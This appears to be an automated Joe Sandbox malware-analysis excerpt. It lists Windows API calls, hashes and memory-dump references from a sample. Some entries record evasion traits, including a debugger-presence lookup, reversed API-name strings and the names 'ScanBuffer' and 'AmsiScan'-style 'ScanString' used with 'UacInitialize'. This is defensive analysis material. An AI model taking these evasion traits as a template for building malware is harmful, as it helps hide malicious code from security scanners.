                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E7E649
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02E7E682
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E7E6FF
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02E7E718
                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02E7E74D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-0
                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                  • Instruction ID: 333ae87848f14f9be3273540aa041970453cf7f135bb8a03886c97f604cbff88
                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                  • Instruction Fuzzy Hash: 0A51EA7594062D9BDB22DB98CC80BD9B3BDAF49304F4491D9F609EB241DB30AF858F61
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E735BA
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02E73609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E735ED
                                  • RegCloseKey.ADVAPI32(?,02E73610,00000000,?,00000004,00000000,02E73609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E73603
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 87c90e325fed2ac077c897e11aafad218b2dd5079185383613f33415a2e3934c
                                  • Instruction ID: 4d61e329694ac991aa2ac6f2bb58a4c77be88d009a5486ced2d2c3c0f6975fcb
                                  • Opcode Fuzzy Hash: 87c90e325fed2ac077c897e11aafad218b2dd5079185383613f33415a2e3934c
                                  • Instruction Fuzzy Hash: 9901B1759C0358BAEB11EBD19D02BB977ECDB08B00F5085A3BA04D6680E674AA10EA59
                                  APIs
                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
                                  • GetProcAddress.KERNEL32(?,?), ref: 02E882E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: Kernel32$sserddAcorPteG
                                  • API String ID: 667068680-1372893251
                                  • Opcode ID: d2e3fec4016e86c76f9ce49cd42a8e23877dc28834d05fd27aa5430406b1c557
                                  • Instruction ID: d62610b56f7a1e71f722e01ed2fb4ed9150c0dbc8d0060ae7f10a1e7f0981ff5
                                  • Opcode Fuzzy Hash: d2e3fec4016e86c76f9ce49cd42a8e23877dc28834d05fd27aa5430406b1c557
                                  • Instruction Fuzzy Hash: EA014F786C4308BFEB04EFA4DC41E5AB7BEEB48B10F91E860F908D7640D630A950CA14
                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,02E7AAEF,?,?,00000000), ref: 02E7AA70
                                    • Part of subcall function 02E7A7CC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA
                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02E7AAEF,?,?,00000000), ref: 02E7AAA0
                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9A4,00000000,00000000,00000004), ref: 02E7AAAB
                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02E7AAEF,?,?,00000000), ref: 02E7AAC9
                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9E0,00000000,00000000,00000003), ref: 02E7AAD4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread$CalendarEnum
                                  • String ID:
                                  • API String ID: 4102113445-0
                                  • Opcode ID: 6afd60a8f88fd9b111f6ebac4371301576d0b1052961342f3503bb1a0325facf
                                  • Instruction ID: 35abfcafbf05f527efa1aa0588cebfa05a90bcb3a17e007c4dbecc42478b43b7
                                  • Opcode Fuzzy Hash: 6afd60a8f88fd9b111f6ebac4371301576d0b1052961342f3503bb1a0325facf
                                  • Instruction Fuzzy Hash: 0201F2B12C0A446FFA11FBA4DC12F6F725EDB81724FA1E530F501967C0E6759E008EA5
                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,02E7ACD8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02E7AB37
                                    • Part of subcall function 02E7A7CC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: 51830dee199f3ac085d7d39db66e077fd87af932c8fdc2c0496592eca8be7e58
                                  • Instruction ID: 186664e12d947455119b49f17dac0ff9c93d93484f215164a446187476dae07d
                                  • Opcode Fuzzy Hash: 51830dee199f3ac085d7d39db66e077fd87af932c8fdc2c0496592eca8be7e58
                                  • Instruction Fuzzy Hash: 3541CF717C45055BD712EB7888946FFB2FBDB85208B64F536F452C7388EA349902CA61
                                  APIs
                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E88244,?,?,00000000,?,02E87A86,ntdll,00000000,00000000,02E87ACB,?,?,00000000), ref: 02E88212
                                    • Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1
                                  • GetModuleHandleA.KERNELBASE(?), ref: 02E88226
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: HandleModule$AddressProc
                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                  • API String ID: 1883125708-1952140341
                                  • Opcode ID: d0199fd8bc1f380afcf01499f85ae669fef7a22515d30cf82ae386312cad3f09
                                  • Instruction ID: a97e9c02aefcaa3a87129ca6e06c60d5aea255060db42c0b0d3a73b0566a7629
                                  • Opcode Fuzzy Hash: d0199fd8bc1f380afcf01499f85ae669fef7a22515d30cf82ae386312cad3f09
                                  • Instruction Fuzzy Hash: 27F06D306C4708BFEB40FBB5DD0191AB7EDE789700BD2E860F94CC2650E630AD108A25
                                  APIs
                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02E8FAE7,UacInitialize,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,Initialize), ref: 02E8F6EA
                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E8F6FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: IsDebuggerPresent$KernelBase
                                  • API String ID: 1646373207-2367923768
                                  • Opcode ID: d35ba05eed2e82d3863f139368a1089753c8e84c38e2e280520738aca375797e
                                  • Instruction ID: e42199b99fac4878d00dc37f5af49b2bc284b75965c3f4daa53b6c4e0259d722
                                  • Opcode Fuzzy Hash: d35ba05eed2e82d3863f139368a1089753c8e84c38e2e280520738aca375797e
                                  • Instruction Fuzzy Hash: A2D012913E07401DF90077F41CC4819024D895553D3A0BE30B06FD6492E5A788555410
                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02E9D10B,00000000,02E9D11E), ref: 02E7C482
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02E7C493
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 4df78a3a3fa593a2ad0bcc10bc2f943f79bf77cfd6a88b06c0ad7d6405864926
                                  • Instruction ID: e189e200c2534b9fe1f063c80e3cbc888bd069ea549729b7b1123efc6eb2f8c1
                                  • Opcode Fuzzy Hash: 4df78a3a3fa593a2ad0bcc10bc2f943f79bf77cfd6a88b06c0ad7d6405864926
                                  • Instruction Fuzzy Hash: 84D05EA0AC03015EE6209FF25888A32329C830834CF58F837E20185201E77558508F85
                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E7E29F
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E7E2BB
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E7E332
                                  • VariantClear.OLEAUT32(?), ref: 02E7E35B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                  • Instruction ID: f2c5f1f143f7c82922a15d1d93299d527c1e4bda3980e795f7c8a2e801c8de72
                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                  • Instruction Fuzzy Hash: 1B412975A402299FCB62DB58CC90BD9B3BDAF59304F0891D9E64DE7211DB30AF858F60
                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E7AD61
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E7AD85
                                  • GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E7ADA0
                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E7AE36
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID:
                                  • API String ID: 3990497365-0
                                  • Opcode ID: d898fd6f81c99f57ac89e2fdf397dbfb623938ad67e5cf92b3a49a54b4edbb4f
                                  • Instruction ID: 74e9a68271b658ceb32d021be4eacb4ed89df97b36bf684a10fa7d91a311b68a
                                  • Opcode Fuzzy Hash: d898fd6f81c99f57ac89e2fdf397dbfb623938ad67e5cf92b3a49a54b4edbb4f
                                  • Instruction Fuzzy Hash: B5414B70A802589BDB61DB68CC84BDEB7FDAB18304F4090E5A648E7341DB74AF88CF51
                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E7AD61
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E7AD85
                                  • GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E7ADA0
                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E7AE36
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID:
                                  • API String ID: 3990497365-0
                                  • Opcode ID: 95940d0247da054abbb648bd46a54e81e4c977f131765ca6931700c0b40744c6
                                  • Instruction ID: 029f59b1193c8d880ebc5ca39a75f67fab654ae23596dc44ab44b2fec4af1ce8
                                  • Opcode Fuzzy Hash: 95940d0247da054abbb648bd46a54e81e4c977f131765ca6931700c0b40744c6
                                  • Instruction Fuzzy Hash: A4414C70A802589BDB61DB68CC84BDEB7FDAB18304F4090E5A648E7341DB74AF88CF51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b6837786b63149f5d45002c7ef2e27a75f70456dfc90f32f955a053c6da68189
                                  • Instruction ID: dfdf3842260e3118e6f149b19ed6e66fabf91529a542f3a71f5ae32b6d3755c9
                                  • Opcode Fuzzy Hash: b6837786b63149f5d45002c7ef2e27a75f70456dfc90f32f955a053c6da68189
                                  • Instruction Fuzzy Hash: ABA1C3B67907000BD718AA7D9C843AEB396DBC5329F18E27EE21DCF381EB6489418751
                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02E795E2), ref: 02E7957A
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02E795E2), ref: 02E79580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 5ce60783d77237109e4550609e0c3e7730112109665070f4c1869e6e3b4fc9f6
                                  • Instruction ID: 907cb1486d554fd26e097aeddf739e5f65389a6699ddabe7c45960cc27edc2b0
                                  • Opcode Fuzzy Hash: 5ce60783d77237109e4550609e0c3e7730112109665070f4c1869e6e3b4fc9f6
                                  • Instruction Fuzzy Hash: 0D215371A401289FDB11DFA8C881AEEB3B9EF09700F51A4A5F905E7291E730DE40DFA5
                                  APIs
                                    • Part of subcall function 02E881D4: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E88244,?,?,00000000,?,02E87A86,ntdll,00000000,00000000,02E87ACB,?,?,00000000), ref: 02E88212
                                    • Part of subcall function 02E881D4: GetModuleHandleA.KERNELBASE(?), ref: 02E88226
                                    • Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
                                    • Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1
                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E883CA), ref: 02E883AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                  • String ID: FlushInstructionCache$Kernel32
                                  • API String ID: 3811539418-184458249
                                  • Opcode ID: 8c996c04d76bb3a92f1ad00a4dc25e87101eb849e912bb6a118e27148fe88672
                                  • Instruction ID: 8779d2c8503d70a7103d0e189dc7c1087653fc12e9efad0b0e68c59081d414d7
                                  • Opcode Fuzzy Hash: 8c996c04d76bb3a92f1ad00a4dc25e87101eb849e912bb6a118e27148fe88672
                                  • Instruction Fuzzy Hash: 380146716C0208FFE741FEA5DC52B5AB7AEEB48B00F91E421BA08D6680D674A9508B25
                                  APIs
                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8AF54
                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02E8AF84
                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02E8AFA3
                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8AFAF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
                                  • Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd
                                  Similarity
                                  • API ID: Read$Write
                                  • String ID:
                                  • API String ID: 3448952669-0
                                  • Opcode ID: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
                                  • Instruction ID: 9a1bc45291727bce65a1aabd8bb5810067028e9a12db1d5aa60e6edd3aff1eb8
                                  • Opcode Fuzzy Hash: f542dd3da5673580082e1079a960d77ba65b17ad2deace2ea67f985a5ee5088c
                                  • Instruction Fuzzy Hash: F721DAB26806199FDB20EF66CC80B9E736AEF40358F04D522FD5C97380D734E8158B90